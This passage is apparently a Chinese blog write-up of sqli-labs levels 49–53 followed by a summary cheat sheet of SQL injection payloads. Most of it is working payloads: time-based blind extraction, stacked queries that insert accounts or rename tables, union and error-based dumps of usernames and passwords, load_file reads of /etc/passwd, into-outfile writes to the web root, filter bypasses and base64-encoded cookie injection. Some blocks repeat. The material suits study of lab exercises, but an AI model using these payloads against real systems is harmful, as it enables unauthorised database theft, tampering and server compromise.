    ?sort=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+
    逐一判断数据库字符
    ?sort=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+
    判断所有表名长度
     
    ?sort=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+
    逐一判断表名
    ?sort=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+
    判断所有字段名的长度
    
    ?sort=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+
    逐一判断字段名。
    ?sort=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+
    判断字段内容长度
     
    ?sort=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+
    逐一检测内容。

49

  • 单引号闭合,无报错,同理,,时间盲注,布尔盲注

    布尔盲注在order by

    ?sort=’| rand(1=2)–+

    使用时间盲注

  • 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    ?sort=1'and if(length((select database()))>9,sleep(5),1)--+
    判断数据库名长度
     
    ?sort=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+
    逐一判断数据库字符
    ?sort=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+
    判断所有表名长度
     
    ?sort=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+
    逐一判断表名
    ?sort=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+
    判断所有字段名的长度
    
    ?sort=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+
    逐一判断字段名。
    ?sort=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+
    判断字段内容长度
     
    ?sort=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+
    逐一检测内容。

50(堆叠排序注入)

堆叠/报错/盲注

  • 有报错+数字类型

  • 存在 if (mysqli_multi_query($con1, $sql))—>堆叠注入

  • 1
    2
    ?sort=1;insert into users(id,username,password) values('41','bx','2328');--+
    知道了账户和密码

51

堆叠/报错/盲注

  • 有报错+单引号类型

  • 存在 if (mysqli_multi_query($con1, $sql))—>堆叠注入

  • 1
    2
    ?sort=1';insert into users(id,username,password) values('41','bx','2328');--+
    知道了账户和密码

52

堆叠/盲注

无报错+数字型

  • 存在 if (mysqli_multi_query($con1, $sql))—>堆叠注入

  • 1
    2
    ?sort=1;insert into users(id,username,password) values('41','bx','2328');--+
    知道了账户和密码

53

堆叠/盲注

无报错+单引号

  • 存在 if (mysqli_multi_query($con1, $sql))—>堆叠注入

  • 1
    2
    ?sort=1';insert into users(id,username,password) values('41','bx','2328');--+
    知道了账户和密码

总结(精华)

sql注入的诸多payoad利用

sql注入

一、union联合查询注入

常用函数

information_schema.tables #information_schema下面的所有表名
information_schema.columns #information_schema下面所有的列名
table_name #表名
column_name #列名
table_schema #数据库名
information_schema进行跨库攻击

查看当前数据库

?id=-1 union select 1,database() –+

1、获取到所有的数据库名称

?id=-2 union select 1,group_concat(schema_name),3 from information_schema.schemata–+
2、指定获取book库中的表名信息

?id=-2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=’book’–+
3、获取指定数据库security下的users表的列名信息

?id=-2’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’ and table_schema=’security’–+
4、查询到指定数据

?id=-2 union select book_id,book_title,book_author from book.book limit 0,1——z–+
?id=-1’ union select 1,2,group_concat(username ,id , password) from users ——全部

文件读写函数注入

load_file 文件读取

into outfile 或into dumpfile 文件写入

?id=-2 union select 1,load_file(‘/etc/passwd’),3
?id=-2’ union select 1,load_file(‘/var/www/html/flag.php’),3–+
?id=-2’union select 1,’‘,3 into outfile ‘/var/www/html/chuan.php’ –+

二、报错盲注

报错注入所利用函数

updatexml extractvalue floor

‌updatexml‌函数的基本语法:

updatexml(xml_document, XPath_string, new_value)
其中,xml_document是XML文档对象,XPath_string是Xpath路径表达式,new_value是更新后的内容。在报错注入中,我们通常将第一个和第三个参数设置为任意值,重点是通过第二个参数注入不符合Xpath语法的表达式,从而引起数据库报错,并通过错误信息获取数据。

extractvalue‌函数的基本语法:

extractvalue(xml_frag, xpath_expr)
其中,xml_frag是XML片段,xpath_expr是Xpath表达式。在报错注入中,通过提供一个无效的Xpath表达式,导致函数报错,从而获取数据。

floor()

用于返回小于或等于一个给定数字的最大整数。在SQL注入中,利用 floor() 函数可以构造报错注入。它通常和 group by 以及 count(*) 等函数一起使用来触发数据库报错,从而获取敏感信息。

报错语句

1’ and extractvalue(1,concat(0x7e,(select group_concat(id,0x7e,username,0x3a,password) from security.users))) #

使用substring截断
?id=1' and extractvalue(1,concat(0x7e, (select substring((select group_concat(id,0x7e,flag) from ctf.flags),1,1000) )))--+

1、updatexml payload示例

1、爆数据库版本信息
k’ and updatexml(1,concat(0x7e,(select version()),0x7e),1)%23
k写啥都可以,0x7e是16进制,表示字符‘~’。
selecty
2、爆数据库当前用户
?id=1” and updatexml(1,concat(0x7e,(select user()),0x7e),1)–+

3、爆数据库

  • 所有
    ?id=1’ and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1),0x7e),1)–+
  • 当前
    ?id=1” and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+

4、爆表
?id=1” and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)–+
更改limit后面的数字limit 0完成表名遍历(即在查询网址上面修改来一个一个查看)。

使用group_concat(table_name)一次性查询出所有的表名
?id=1” and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)–+

5、获取users表的字段名
?id=1” and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’),0x7e),1)–+

6、获取users表的内容
id=1” and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1)–+

2、extractvalue payload

payload
1’ and extractvalue(1,concat(0x7e,user(),0x7e,database())) #

1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #

1’ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’))) #

1’ and extractvalue(1,concat(0x7e,(select group_concat(user_id,0x7e,first_name,0x3a,last_name) from dvwa.users))) #

3、floor函数

判断是否存在报错注入
id=1’ union select #添加count()可以增加列数 count(),floor(rand(0)*2) x from information_schema.schemata group by x#

爆出当前数据库名
id=1’ union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x #

爆出表
id=1’ union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema=’dvwa’ limit 0,1)) x from information_schema.schemata group by x#

爆出字段名
id=1’ union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(column_name) from information_schema.columns where table_name=’users’ and table_schema=’dvwa’ limit 0,1)) x from information_schema.schemata group by x#

爆出user和password
id=1’ union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x#

严格过滤

逻辑运算符,注释符以及空格
?id=1’||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=’security’))),1))||’0 爆表

?id=1’||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=’security’aandnd(table_name=’users’)))),1))||’0 爆字段

?id=1’||(updatexml(1,concat(0x7e,(select(group_concat(passwoorrd,username))from(users))),1))||’0 爆密码账户

三、其余注入

1、加解密注入

抓取cookie数据包

1
2
3
4
5
6
7
8
9
10
GET /Less-21/index.php HTTP/1.1
Host: 10.1.1.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10.1.1.133/Less-21/index.php
Connection: close
Cookie: uname=YWRtaW4%3D
Upgrade-Insecure-Requests: 1

YWRtaW4%3D这是一个base64加密的字符串其中%3D是编码中的=符号,把他发送到编码模块当中解密,得到明文

发现这个是注入点需要将原来的注入方式重新加密发送给服务器

也就是说admin’ and 1=1加密之后的值是YWRtaW4nIGFuZCAxPTE=

获取数据库名称admin’ or updatexml(1,concat(0x7e,(database())),0) or ‘加密后cookie值Cookie: uname=YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChkYXRhYmFzZSgpKSksMCkgb3IgJwo=

2、二次注入

二次注入一般是用于白盒测试、黑盒测试就算是找到注入也没办法攻击。

最后我们看到的是将admin的账户密码修改为了123456而admin’#并没有发生改变,原因是代码执行的过程中将’#没有过滤直接带入执行导致’与前面的代码闭合而#将后面的代码给注释。

3、dnslog注入

涉及资源:http://ceye.io

参考资料:https://www.cnblogs.com/xhds/p/12322839.html

使用DnsLog盲注仅限于windos环境。

4、中转注入

中转一个网站,利用网站进行数据集中改变

5、堆叠查询注入

stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql 中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。
简单payload

http://10.1.1.133/Less-38/index.php?id=1 ‘;insert into users(id,username,password) values ( 39, ‘less38 ‘, ‘hello ‘)–+
查询数据库

1’;show databases;–+
查表

?inject=1’;show tables–+
查列

1’; show columns from words– q
修改操作

1’;rename table words to word2;rename table 1919810931114514 to words;ALTER TABLE words ADD id int(10) DEFAULT ‘12’;ALTER TABLE words CHANGE flag data VARCHAR(100);– q


sqlilab题解&&总结
http://example.com/2025/10/27/sqlilab题解&&总结/
作者
Piggy Sprint
发布于
2025年10月27日
许可协议